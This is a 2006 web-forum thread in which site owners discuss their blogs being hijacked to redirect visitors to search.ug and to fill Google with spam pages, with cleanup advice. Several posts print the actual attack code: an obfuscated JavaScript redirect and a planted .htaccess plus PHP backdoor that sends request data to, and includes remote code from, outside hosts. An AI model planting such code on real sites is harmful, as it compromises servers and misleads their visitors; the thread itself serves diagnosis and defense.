
Search.ug

Postby Frenchtowner » Thu Feb 02, 2006 12:31 pm

This hijacking problem continues. My site has been affected in the same manner as noted above with scores of fictitious pages on my site like the one listed below on Google:

nyc travel blog part 2 madonna versace
nyc travel blog part 2 madonna versace, parent directory fifa 2000 -xxx -html... nortons antivirus 2005 full download english warez, torrent for fate game, ...
www.frenchtowner.com/blog-frenchtown-nj/ 2005/05/nyc-travel-blog-part-2-madonna-versace.html - 10k - Cached - Similar pages

I have corrected all the form pages associated with this problem, but there are still pages from my blog that are redirecting to search.ug and other sites like search.kg, find.pl, find.gl, search.tj, and one sex site called icoonet.com. I have looked at my directories to find suspicious files and looked at my .htaccess files for the same. My problem is that I don't know what should and should not be there. I did not find a configs.php file.

You should know that my blog is associated with blogspot, blogger.com and hosted on my server. I have backed up my entire blog and taken it down and reloaded and republished it, and it did not help.

In the redirecting pages there is a common mistake in all of them, there is a blank space in the address of the url which causes the 404 redirect. Some script however is sending these fake blog pages to these other sites and not to my default custom 404 page.

I would appreciate some advice on this matter.
PRO New Member
Posts: 3
Joined: Thu Feb 02, 2006 2:46 am
Location: New Jersey

Postby doodlebee » Thu Feb 02, 2006 1:27 pm

Did you change the permissions on your files before reloading them? Most of them will be reset to odd numbers (if I recall, I had some set to 777, but most were weird, like 604 and stuff), when they should be things like 644 and 755. If you don't change the permissions, then you're just leaving yourself open to another attack.

Also, look through your blog entries - not each individual one, but the actual pages. Do you see, anywhere towards the bottom, a small <iframe> tag with a bunch of jumbled characters? That's another way they do it - put in a small 1x1 iframe and place the redirect in there. If you saved all your entries and reuploaded them without removing this (if it's there), then you're just putting it back up.
PRO New Member
Posts: 6
Joined: Tue Sep 27, 2005 9:17 pm
Location: United States

Postby doodlebee » Thu Feb 02, 2006 1:31 pm

By the way, I just went to your site and it's fine. No weird code at the bottom. I also plugged in a non-valid address - took me to your 404 page.

Have you scanned your own computer for viruses and/or spyware and stuff? Could be that your browser really is hijacked - you need to download Lavasoft's Ad-Aware and Spybot Search & Destroy. (Run both - as one catches what the other misses.) I'd also download HijackThis and give it a go, as well.

Your site isn't what appears to be hijacked, as it's coming up roses for me.

Oh yeah, and stop using Internet Explorer. Use safe browsers, like Mozilla Firefox, or Opera. That little switch stopped about 95% of all the "bad stuff" that was happening to me from using IE all the time.
PRO New Member
Posts: 6
Joined: Tue Sep 27, 2005 9:17 pm
Location: United States

Postby Frenchtowner » Thu Feb 02, 2006 11:52 pm

Doodlebee,

Thanks for looking over my site, and for offering suggestions. I will check the permissions on my files and directories to try to close some doors here.

I came up with my own solution today that was not elegant, but it was the best one that I could think of. I replaced all of the fictitious pages that Google had listed as part of my site for everything from warez sites, code cracking to teen sex with custom error pages.

I do believe that I was hacked and hijacked because I found this code on the cached version of the page that was redirecting users to search.ug and its sister sites:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>cake cartoon toppers wedding</title>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META http-equiv="Content-Language" content="en-us">
<META http-equiv="Expires" content="-1">
<META http-equiv="revisit-after" Content="3 days">
<META http-equiv="robots" content="index,follow">
<META name="robots" content="ALL">
<META name="rating" content="General">
<META name="revisit" content="3 days">
<META name="Content-Language" Content="en-us">
<META name="Language" Content="english">
<META name="Subject" Content="cake cartoon toppers wedding, Drive Image 5 serial number, wvvw.escort-central.com/forum/ images/avatars/axel f-crazy forg.jsp">
<META name="description" Content="cake cartoon toppers wedding, beyonce-sexy, idea pl profit, simple dns 3.50.01 crack, muonline get fast exp">
<META name="keywords" Content="cake cartoon toppers wedding, my humps.mid download, sat hackz, kazaa pro registration key, sony mp3 plug-in 2 keygen gratis, Katya Lel, Doletaj mp3, ragnarok online item / zeny generator">
<script language="JavaScript">
<!--
function ames() {
if(self.parent.frames.length != 0)
self.parent.location = document.location;
}
function gotopage(adress) {
if(adress != '') { window.location.href = adress; }
}
ames();
eval('windo'+'w.loc'+'at'+'ion='+'"ht'+'tp:'+'//'+'sea'+'rch'+'.ug'+'/?'+'cT1e'+'Xl5'+'zP'+'WVeX'+'l5kPQ=="');
// -->
</script>

I find it funny that this javascript would be on the page when the webmaster for search.ug assured me that he had nothing to do with this and that it must be his competitors that were doing this to destroy his business. Is it possible that he did not do the redirects and that someone else used his address and inserted this code on these pages?


EDITED by neuro for hyperlink
PRO New Member
Posts: 3
Joined: Thu Feb 02, 2006 2:46 am
Location: New Jersey

Postby stranmills » Mon Feb 27, 2006 3:17 pm

I was looking at the log files for a site I run. From early December 05 traffic started coming in looking for a subdirectory where I had a trial version of an on-line shopping-cart application. I suspect the PHP files had been hacked to redirect people looking for e.g. crazy frog download, slovoed, partition magic crack, etc to search.ug. search.ug then displays adverts for dating agencies etc.

I removed the offending PHP files but Google, bless it, has the links cached so I still get some traffic. I don't think ASP is much safer. I noticed some asp sites have been hijacked by search.ugh!

By the way, they have the cheek to borrow the MS search favicon!
PRO New Member
Posts: 1
Joined: Mon Feb 27, 2006 2:53 pm
Location: Ireland

solution

Postby asachdeva » Sun Apr 30, 2006 4:58 pm

The problem is definitely in your computer. As common sense suggests, if Google is hacked the news is big..... I mean very big.

This problem occurs after running the Macromedia (now owned by Adobe) Flash Player content from a bad website; read http://www.macromedia.com/devnet/securi ... 06-03.html
as well as
http://www.microsoft.com/technet/securi ... 16208.mspx

What you need to do?
Go to Tools->Internet Options->Security->Internet, press Default level, then raise the bar to HIGH.
After you do this you won't be able to access certain sites; to do that, add those sites to your Trusted Sites list (remove the check box "requires server verification"). Also change the security level of Trusted Sites to Medium from Low.

This should fix the problem and will make your browsing safer.

Njoi
PRO New Member
Posts: 1
Joined: Sun Apr 30, 2006 4:40 pm
Location: India

Postby TheDoctor » Fri Jul 21, 2006 4:13 pm

The search.ug spam works like this:

The hacker finds a folder CHMOD'ed 777 on your webserver (777 means world read, write, execute).

He then uploads an .htaccess file to that folder.

The contents of the .htaccess file will contain something like this:

Options -MultiViews
ErrorDocument 404 //public_html/home/data/time.php
Options -MultiViews
ErrorDocument 404 //home/data/report.php


He then uploads the files (named in the .htaccess file - in the example above, time.php and report.php) to the same folder CHMOD'ed 777.

The content of time.php, report.php, etc. will contain the following PHP Code:

error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}

The next time GOOGLE or any other major search engine spiders the account numerous SPAM pages will be inserted into the ROBOT'S cache AS IF THEY EXISTED on your webserver.

On GOOGLE they will appear under the subcategory as: Supplemental Result

Solution: delete the .htaccess file plus any file(s) that it's redirecting to and CHMOD the folder to 755.
PRO New Member
Posts: 1
Joined: Fri Jul 21, 2006 3:56 pm
Location: Midwest

Postby kd1966 » Fri Jul 21, 2006 5:03 pm

Welcome to PROnetworks TheDoctor!! Great to have you here; please stop by our Introduction Area so we can welcome you properly.

Thanks for the info on this, we appreciate it; enjoy the site!
PRO PLATINUM
Posts: 6831
Joined: Tue Aug 09, 2005 2:00 am
Location: USA - GSO - NC

Postby Frenchtowner » Thu Aug 24, 2006 11:42 pm

After a long period of thinking that I had resolved this problem on my website, I found out today that all of my work is not done.

My website only has 334 pages, but in a Google.com site search, my site shows 216,000 pages. These all show up as Supplemental Result pages and do not redirect to search.ug or any of its sister sites, unless you look at the Google cached results.

I have checked all of my page permissions, checked for illegitimate files, and the problem has only gotten worse since the last Google update.

I would love to have some advice, if anyone knows where to start.

PS, there are a huge number of other sites with this same problem, some of them non-profit organization websites.

Thanks,
John
PRO New Member
Posts: 3
Joined: Thu Feb 02, 2006 2:46 am
Location: New Jersey
